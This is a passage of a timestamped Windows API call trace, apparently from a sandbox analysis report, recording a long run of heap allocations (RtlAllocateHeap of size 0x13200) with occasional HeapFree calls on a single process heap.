Size=0x468) returned 0x55c5d0 [0107.983] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548af0 | out: hHeap=0x530000) returned 1 [0107.983] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2596380 [0107.984] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x25a9590 [0107.984] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x25bc7a0 [0107.985] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x25cf9b0 [0107.985] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x25e2bc0 [0107.986] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2600080 [0107.987] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2613290 [0107.987] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26264a0 [0107.988] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26396b0 [0107.988] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x264c8c0 [0107.989] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x265fad0 [0107.989] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2672ce0 [0107.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2685ef0 [0107.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2699100 [0107.990] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26ac310 [0107.991] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26bf520 [0107.991] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26d2730 [0107.992] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26e5940 [0107.992] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x26f8b50 [0107.992] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x270bd60 [0107.993] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x271ef70 [0107.993] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2732180 [0107.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2745390 [0107.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27585a0 [0107.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x276b7b0 [0107.995] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x277e9c0 [0107.995] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2791bd0 [0107.995] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27a4de0 [0107.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27b7ff0 [0107.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27cb200 [0107.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27de410 [0107.997] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x27f1620 [0107.998] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2804830 [0107.998] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2817a40 [0107.999] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x282ac50 [0107.999] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x283de60 [0108.000] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2851070 [0108.000] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2864280 [0108.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2877490 [0108.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x288a6a0 [0108.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x289d8b0 [0108.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x28b0ac0 [0108.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x28c3cd0 [0108.003] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x28d6ee0 [0108.003] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x28ea0f0 [0108.004] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x28fd300 [0108.004] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2910510 [0108.004] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x698) returned 0x5488f0 [0108.005] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55c5d0 | out: hHeap=0x530000) returned 1 [0108.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2923720 [0108.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2936930 [0108.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2949b40 [0108.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x295cd50 [0108.006] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x296ff60 [0108.006] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2983170 [0108.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2996380 [0108.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x29a9590 [0108.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x29bc7a0 [0108.008] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x29cf9b0 [0108.008] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x29e2bc0 [0108.009] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x29f5dd0 [0108.009] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a08fe0 [0108.010] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a1c1f0 [0108.010] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a2f400 [0108.011] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a42610 [0108.309] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a55820 [0108.310] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a68a30 [0108.310] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a7bc40 [0108.311] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2a8ee50 [0108.311] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2aa2060 [0108.312] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ab5270 [0108.312] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ac8480 [0108.313] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2adb690 [0108.313] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2aee8a0 [0108.313] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b01ab0 [0108.313] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b14cc0 [0108.314] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b27ed0 [0108.314] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b3b0e0 [0108.315] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b4e2f0 [0108.315] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b61500 [0108.316] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b74710 [0108.316] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b87920 [0108.317] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2b9ab30 [0108.317] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2badd40 [0108.318] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2bc0f50 [0108.318] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2bd4160 [0108.319] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2be7370 [0108.319] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2bfa580 [0108.320] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c0d790 [0108.320] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c209a0 [0108.321] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c33bb0 [0108.321] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c46dc0 [0108.322] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c59fd0 [0108.322] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c6d1e0 [0108.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c803f0 [0108.323] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2c93600 [0108.324] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ca6810 [0108.324] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2cb9a20 [0108.324] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2cccc30 [0108.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2cdfe40 [0108.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2cf3050 [0108.325] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d06260 [0108.326] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d19470 [0108.327] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d2c680 [0108.327] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d3f890 [0108.327] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d52aa0 [0108.328] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d65cb0 [0108.328] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d78ec0 [0108.329] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d8c0d0 [0108.329] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2d9f2e0 [0108.330] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2db24f0 [0108.330] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2dc5700 [0108.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2dd8910 [0108.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e00080 [0108.333] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e13290 [0108.333] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e264a0 [0108.334] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e396b0 [0108.334] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e4c8c0 [0108.335] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e5fad0 [0108.335] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9e0) returned 0x55c5d0 [0108.335] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5488f0 | out: hHeap=0x530000) returned 1 [0108.335] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e72ce0 [0108.336] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e85ef0 [0108.336] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2e99100 [0108.337] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2eac310 [0108.337] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ebf520 [0108.338] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ed2730 [0108.339] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ee5940 [0108.340] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ef8b50 [0108.340] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f0bd60 [0108.341] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f1ef70 [0108.341] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f32180 [0108.342] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f45390 [0108.342] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f585a0 [0108.343] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f6b7b0 [0108.343] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f7e9c0 [0108.547] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2f91bd0 [0108.547] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2fa4de0 [0108.548] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2fb7ff0 [0108.548] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2fcb200 [0108.549] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2fde410 [0108.549] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x2ff1620 [0108.549] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3004830 [0108.550] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3017a40 [0108.550] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x302ac50 [0108.551] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x303de60 [0108.551] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3051070 [0108.551] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3064280 [0108.552] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3077490 [0108.553] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x308a6a0 [0108.553] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x309d8b0 [0108.553] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x30b0ac0 [0108.554] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x30c3cd0 [0108.554] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x30d6ee0 [0108.555] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x30ea0f0 [0108.555] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x30fd300 [0108.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3110510 [0108.556] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3123720 [0108.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3136930 [0108.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3149b40 [0108.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x315cd50 [0108.557] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x316ff60 [0108.558] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3183170 [0108.558] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3196380 [0108.559] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x31a9590 [0108.559] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x31bc7a0 [0108.560] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x31cf9b0 [0108.560] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x31e2bc0 [0108.560] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x31f5dd0 [0108.561] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3208fe0 [0108.561] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x321c1f0 [0108.562] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x322f400 [0108.562] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3242610 [0108.563] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3255820 [0108.563] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3268a30 [0108.563] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x327bc40 [0108.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x328ee50 [0108.564] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x32a2060 [0108.565] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x32b5270 [0108.565] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x32c8480 [0108.565] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x32db690 [0108.566] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x32ee8a0 [0108.566] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3301ab0 [0108.566] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3314cc0 [0108.567] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3327ed0 [0108.567] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x333b0e0 [0108.568] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x334e2f0 [0108.568] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3361500 [0108.568] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3374710 [0108.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3387920 [0108.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x339ab30 [0108.570] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x33add40 [0108.570] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x33c0f50 [0108.571] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x33d4160 [0108.571] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x33e7370 [0108.572] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x33fa580 [0108.572] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x340d790 [0108.572] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34209a0 [0108.573] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3433bb0 [0108.573] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3446dc0 [0108.574] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3459fd0 [0108.574] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x346d1e0 [0108.574] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34803f0 [0108.575] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3493600 [0108.575] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34a6810 [0108.576] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34b9a20 [0108.576] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34ccc30 [0108.576] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34dfe40 [0108.577] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x34f3050 [0108.577] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3506260 [0108.578] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3519470 [0108.578] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x352c680 [0108.578] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x353f890 [0108.579] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3552aa0 [0108.579] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3565cb0 [0108.580] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3578ec0 [0108.580] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x358c0d0 [0108.580] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x359f2e0 [0108.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x35b24f0 [0108.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x35c5700 [0108.582] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x35d8910 [0108.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x35ebb20 [0108.785] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x35fed30 [0108.786] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3611f40 [0108.786] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3625150 [0108.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3638360 [0108.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xed0) returned 0x57a670 [0108.787] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55c5d0 | out: hHeap=0x530000) returned 1 [0108.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x364b570 [0108.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x365e780 [0108.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3671990 [0108.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3684ba0 [0108.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3697db0 [0108.789] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x36aafc0 [0108.789] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x36be1d0 [0108.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x36d13e0 [0108.790] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x36e45f0 [0108.791] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x36f7800 [0108.791] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x370aa10 [0108.794] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x371dc20 [0108.794] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3730e30 [0108.795] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3744040 [0108.795] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3757250 [0108.795] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x376a460 [0108.796] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x377d670 [0108.796] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3790880 [0108.796] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x37a3a90 [0108.797] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x37b6ca0 [0108.797] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x37c9eb0 [0108.798] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x37dd0c0 [0108.799] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x37f02d0 [0108.799] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38034e0 [0108.799] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38166f0 [0108.800] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3829900 [0108.800] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x383cb10 [0108.800] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x384fd20 [0108.801] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3862f30 [0108.801] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3876140 [0108.802] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x3889350 [0108.802] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x389c560 [0108.803] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38af770 [0108.803] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38c2980 [0108.803] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38d5b90 [0108.804] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38e8da0 [0108.804] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x38fbfb0 [0108.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x390f1c0 [0108.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39223d0 [0108.806] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13200) returned 0x39355e0 